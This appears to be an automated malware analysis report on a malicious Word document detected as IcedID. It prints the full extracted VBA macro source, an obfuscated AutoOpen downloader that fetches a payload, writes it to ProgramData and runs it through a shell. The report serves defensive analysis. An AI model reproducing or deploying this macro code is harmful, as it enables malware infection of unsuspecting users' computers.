Office (OOXML) malware analysis — malicious · 4a6bcebb16dc6eaa

MALICIOUS

Office (OOXML)

100.7 KB Created: 2020-10-19 09:20:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-25

MD5: a2ef74bca2b878acc25712f74f14de6a SHA-1: a3bd7d965a8a217348b36a26e293d81c004257cf SHA-256: 4a6bcebb16dc6eaad13db158f925b172f18a4ef8ed6ddc05f87e203695346990

290 Risk Score

Heuristics 7

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Set sWAwz = CreateObject(iWPVg + "." + "shell")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set ekKeM = VBA.CreateObject(Cpzkl + "" + QHcQF)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	14032 bytes
SHA-256: `9decf4281e6d045355987f9cc69c0309e303d3e0d0c27c5238c564b395776af8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "nuzaQ" Sub DahBf(UeHUM, Optional ByVal daACi As String = "c:\programdata\ZTqoQ.txt", Optional ByVal QHcQF As String = "systemobject") ' Blooms culminated bishoprics ' Plexus mandibles waveform suitably ' Nightdresses overcompensate ' Incoherently rainy ' Palette signor deleting turncoats ' Strive ' Enclosures goes ' Diameters moleskin skipping ' Hive blindness ' Probationary rankers strenuous ' Extremes chinks dudgeon reallocate floater ' Wheedled immunologists entailed wallop ' Starstruck cultivar ' Warm objection beautifully ' Yielded waverers accelerating sanctity roundabout ' Instability waist mondays excursions ' Factitious interactive henge attractor genie ' Sends ' Transmute costar criticised visibilities procrastinator ' Temperate melodrama jars ' Inevitability ' Lichens professor israel ' Wooed veranda program mailmen ceramist convey manic ' Underlings calligrapher Set ekKeM = VBA.CreateObject(Cpzkl + "" + QHcQF) ' Serried appetising ' Dailies dossier adjudicates realms troubling yankees cogent ' Forced ' Holeinone tissue headwaters signifies ' Runofthemill dissatisfied vituperative ' Photochemical stripper fondest credibility Set RTuNF = ekKeM.CreateTextFile(daACi) ' Hullo ' Hygiene gelatin ' Gutters upstart subtropical pattering disciplined ' Rehousing trudge angular ' Defraud inherit planters cipher fossilised ' Overseas boron RTuNF.WriteLine UeHUM ' Emplacement ' Maintainable corollary ascension cleanser defence ' Appropriated ' Apartments ' Stubby adhoc patched ' Travesties surfs RTuNF.Close ' Womaniser ' Validation intelligentsia coordinator ' Shying echoic taxidermy confluent incidence ' Scrums offbeat referrals reclining formulaic ' Ringmaster mesmerised undiscerning ' Bubbled pinions provable ' Revanchist ' Discernibly pined unskilled ' Scouring fairway ' Hangman past curiosity ' Avulsion notion auric ' Incurably radiator ' Kidding jeans antedate communicants ' Shirking nudities ' Differentiators tormentors surfers cosmopolitans ' Homecoming frugally midnights destine refines exotically ' Refuelled availability ' Larynxes trad ' Undermined live workloads glitzy ' Clasped skintight teems humanoids ' Mentors addressability deflowering proximally ' Strict overdubbing steradians ' Twelve ' Union backbones interruptibility ' Corroded ' Speculum devours prejudicial capitally paralyse grudges ' Elands devoting special ' Oddments ovary seamed flexibly ' Bonuses ' Thrifts neighbours ' Anthropomorphic forum vernier initially ' Spread alcoholics maul percussing obliviousness kindness ' Mitigates dissenters ' Colouring crop ' Electronics destroys ' Revolvers inconsistent determinable ' Digests straggle goosestepping End Sub ' Palaeolithic ' Colleague absolutists ' Curvature biomass sloppy robotics exterminator feathering ' Levity calligraphic maltreat epiphanies ' Libya seducers congressional simpletons worthlessness purification Sub AutoOpen() ' Battlecry maladjusted shrimps ' Bamboozled ' Bating pretty mono handout ' Beadles legitimating ' Poured berber ' Bolstered bloodthirsty translate ' Crores spools ' Curls ' Refiner plasmid ' Gluttons ' Firstly foray ' Gushing koreans robbed visibilities globes delinquent degradations waking ' Storks stators underdone squeezer bidding ' Parsings retails responded mistrustful thorn ' Healed biscuity ' Harangued semantic companions ' Leafiness occipital intrinsically ' Grunge coexist assumption availability ' Stronger blithe hems alliterated ' Lain corrects legacy machetes holdall rapped ' Skyscraper ' Rain shortsightedly recombines prohibited ' Urbanisation stretched gustiest treachery succulent consultant externalised ' Pippin malevolent phrases tees curtaining ' Spirituals buttress herds stifle sag ' Parrots impassiveness clover ' Sunshine mats sure ' Catching guesting moderator assails grainier ' Chapel sort initialled gladness surge ' Notions potent lascivious ' Wetsuit argot pilot ' Ironage breezed tasteful flirtation subaltern Dim LmUZM As New dzAJk ' Laxatives implicit yarns ' Sedated squeaker ' Telescoped incoherency bumpkin ' Enquires bouncy hydrocarbons lumen mediator haircare ' Tooled reverent remarking muzzles ' Tusker bonneted throttled tenon ' Restrict muddled bastardy tempter enthusiastically JMcwE = "" ' Fogs confrontation ' Murmured donning mortice doornail cycling replying ' Decay grazer meteorologist bloodsuckers ' Byelection ' Palled bridge ' Folds embarrassment eke hosanna popeyed blunderbuss ' Diametrically contacted garments ' Retrieved fattening vandalising wafer pollutant ' Pirouettes microscopically bistable ' Impersonate sardines ' Abound drizzly rigidities unduly UeHUM = LmUZM.aszML(GRgFE) ' Convertible melody banditry freezer ' Mergers bitmap county revived unhappier professed ' Broiled ' Wake incarnate truffles gunpowder ' Psaltery tillage entomology washout practise DahBf Xvpgd(UeHUM) ' Coup questions ' Malnutrition deports euphemistically ' Peopled stabilised shanks carve reverberations baths ' Encrustation claws ' Contorting ' Cogency were truer degaussed ' Unfolding aglow uninhabited ' Leverage swords ' Maladaptive oinked ' Amiss recantation immobilises antedating soundtracks ' Adulation enemies addled moorhens turfy despoil ' Freak laments lightheartedly mortgages UHenC wIPiZ(0) + "vr32 c:\programdata\ZTqoQ.txt", "wscript" End Sub Function YDNxJ(wweiX, atlSH) ' Menacingly decelerations ' Knuckleduster reconstitute rumania proclaimed ' Humbleness yak absconded birdtables desalination ' Stairhead scimitars spoonfuls ' Rethinking treadle ground today domineering impulsive ' Copulations YDNxJ = Split(wweiX, atlSH) End Function Attribute VB_Name = "ZcURs" ' Centrefold panels batsmen lampoonery backwards ' Sententiously heartbreaks ' Bowlers inaudibility quotients implemented ' Unhappiest rejections espoused pouting gruesome glimmerings ' Girls attack heavily Function Xvpgd(LyHrB) ' Selector anorexia ' Crashing undetectability pronunciations moderated ' Swoops hazily upon ' Hypoglycaemia acidophiles ' Floppier grandly stylist Xvpgd = StrConv(LyHrB, vbUnicode) ' Beneficially ' Rag grandparents dramatisations dullards countenance consented ' Shakable dyspeptic conquistador ' Pikestaff ' Vesicular nonplussed remunerate ' Cranking underrated pretty End Function ' Diversely shaman bushiness mandibular ' Expediency vomits fullblooded fences retrieved ' Infestation facilitated ' Tarpaulin Function Uwnpm() ' Rushes exempted prelates dealer giveaway tightrope ' Changer childcare teaches glow swags ' Punts cittern halon ' Foible answered descriptively apologetic exhibitionists ' Showground whispers ' Motherland swapped traced peeps workmates thor ' Ovens caution draughtier turbocharger ' Onyx overlong ' Semantically trailing unexceptionable goodhope ' Cube presses apostolic ' Harassment seems With ActiveDocument.shapes(1) Uwnpm = .AlternativeText End With End Function ' Parenting tolled stunts ' Graptolites reconstruction student pestle ' Overshadow kidney ' Melt potpourri encroached swiftly inextricably blockbuster turnround ' Vainglory Function wIPiZ(CWntH) ' Containment omnivore assassins orca glowworms pared ' Reminisces repatriation fits ' Uprightly exaggerating deepseated gale danger ' Ratings appointed palpitated ted ' Ages warranted tonguetied ' Dogmatic paragraphs inefficient unvisited ' Evangelists sidings ' Bug worm ' Fornicators pentagrams toyshop touchdown barber ' Deluged lullabies bounty stormiest endpapers transfer ' Wee synapses unfailing ' Decriminalised questionnaire PgrYO = YDNxJ(Uwnpm(), "~~~") UELZW = PgrYO(CWntH) wIPiZ = UELZW End Function Attribute VB_Name = "dzAJk" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function RspAp(tbWvV, UAJQN, ebRBR) ' Cables ' Interviewee tonguetwister ' Vegetables churning ' Modify disdainfully mournfully stalked graphed ' Steepness disengaging anchorage bumbling pedagogue ' Unparodied primogeniture drool adjudged ' Unsmooth internalises indignation topologist RspAp = Mid(tbWvV, UAJQN, ebRBR) End Function Public Function jhUiM(tprPi, PVCra) ' Guise epitomises ' Imagery ' Douching pointer ' Undermine insult squeak schoolteacher ' Repudiates curse blockbusters ' Complicate priesthood stretch wolds ' Agio commonalities ' Inconceivable dampens revocations tangentially cine ' Maintainable inadvertently lumbar flack ' Forgiveness bingo ' Marques allegation ornament ' Impales fabric clefts pew ' Joker venus goalscorers miscarriages flowed ' Solidification noting ' Haemophiliacs replenish discourages similarly ' Trendy grapnel obAtN = Trim(tprPi) For WlEUI = PVCra To Len(obAtN) DJNha = RspAp(obAtN, WlEUI, PVCra) & DJNha Next WlEUI jhUiM = DJNha End Function ' Repopulated chilliness adversaries wellread intaglio ' Guinea worming panicstricken ' Reinterpreted inhabitant humanists ' Subjects drafts ' Pertained ' Overstress proletarianisation Function aszML(OCtBU) ' Statesmen essence printings somersaults befitted conflicted ' Counterfeited espousing flabbier parented exertions ' Bullfrog carbohydrate rediscover ' Monstrously pester firmed apostle ' Shiver auctioneer ' Recruit leather education ' Flooded dodgy vote ibex Dim CPOpQ As Object ' Didactic fern exception tooling ' Despatching omissions belladonna epitap ' Allocate hurtling ' Bursars hangouts wealthier ' Brochure majestic protons bureaux ' Cases commemorated yawn sherlock instituted inwardness ' Symptomless formations immorality swelling ' Burdock mazes ' Reoccur tonne ' Socialists pickerel ' Arcadia recruited ' Untaught indomitable broccoli ' Dazzled hereby windswept spontaneous Set CPOpQ = CreateObject(jhUiM(OCtBU, 1) + "." + jhUiM(OCtBU, 1) + "Request.5.1") ' Infiltrate unworried rhyme massacre fielding ' Remorseful comedy avalanching ' Distinguishable harvests rather ' Parries hedonists diary screwdrivers processable ' Postlude flunked campfire wide redundant ' Gallant curbed storehouse suggestiveness ' Chafes basically discern ' Anthropoid fanfare reference deliriously ' Furnishes ' Substantiation conciliator vampires diverticular ' Overgeneralised aftertaste ' Guns mention ' Sizzled ' Overcame ' Constituted buglers ' Omniscient pallid turntables ' Gdansk tackier spectrophotometry schema ' Opportunistically frowning transhipment ' Unlacing lantern clearly eerily ' Flexor ' Chagrin disgraceful ' Assortments shrubby bashfulness nobodies ' Imbiber lasses neck sculled clamours ledger ' Lifeguard adapts uproots relinking rests roofgarden ' Undulations instigators batik ' Disastrously ' Discrete thaw nightly hiding flattered XDQVO = wIPiZ(1) ' Donkeys incites blockers enjoying soliciting ' Mausoleum matchplay spit ' Gird impeccably assertions coined ' Broadcasting becomes pressings grates regretting watchmen ' Businessmen lexicographer ' Dairying punitive cherish CPOpQ.Open "GET", jhUiM(XDQVO, 1), False ' Olympics indulged defrauded ' Thawing ' Stuckup diffidently hewing ' Pedants ' Trunk engarde sloppiest headlamp CPOpQ.Send ' Pains touchdowns gainsaying sportingly loquacity stalkers ' Platelet promisingly shifted beggar aluminum czar ' Observably ' Profiling overcrowding aszML = CPOpQ.responsebody End Function Attribute VB_Name = "Jxcgk" Public Const GRgFE As String = "ptthniw" Public Const Cpzkl As String = "scripting.file" Sub UHenC(bGLFH, iWPVg) ' Bloke gowns ' Caucuses sourness turnovers ' Pedalled pulsates damming toning stubborn ' Tenor rome ' Keyhole ' Donors prosecuted injustice regimental Set sWAwz = CreateObject(iWPVg + "." + "shell") ' Ally reacquired seasoned ' Veranda intoxicated ' Dress inordinate diuretic halite persecutor ' Pumice sculler pubs david sprinted angering ' Cabbages ' Scythes littering pygmy unambiguity ' Remedial forfeiture unsinkable survivable ' Reattachment compatibles trumpet oversimplifications ' Adapters ' Propitiating crossbred reveille spirit ' Straddle overstuffed abe exults ' Prepays secluded ' Lynx precept hob ' Automotive declarations ' Pluckiest crotchetiness ' Koreans ' Housebuilder ' Mammal ' Disadvantages recuperate ' Allegro bibliographical intercontinental ' Spirits ' Tortured dispersal marching aupairs ' Chemist patently continuance robots alleys recognisably ' Unwieldy blandishments pickaxe ' Sleaze ' Incursion foil negotiates ' Perfected levitates ' Commissars context ' Madwoman transducer his tutu proprietary poorness ' Adulterous corkage ' Accursed ' Blister scarifying isotropically ' Necessitate distribution presidential freeway ' Breezier shearing lunchtime shrugged extremes ' Permutations concludes ripeness pyjamas ' Mid postcode distorts ' Playboy lymphocyte quainter ' Encores standardises ' Aggregated banning ' Wreathes timetabled approvingly ' Apprehensively ' Ornamental proofs agrarian ripostes ' Supple ' Mariners reservoirs ' Rebalanced abbey ' Inaccuracy abacus printing infringements Call sWAwz.exec(bGLFH) ' Adaptively initialising slashed parallaxes weeds ' Whitewash broomsticks regent ' Glowworms aunts merchantmen ' Breastplate ' Underworld restraint debilitated triangulation dilettantes chatty ' Transitions convert broadway ' Paradigms feigned unqualified paraphrase maladroit amulets bracer End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	49664 bytes
SHA-256: `0b5cebc697a1c53e47eda0d330875786a65472433ce78853b04b5ef63129da03`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.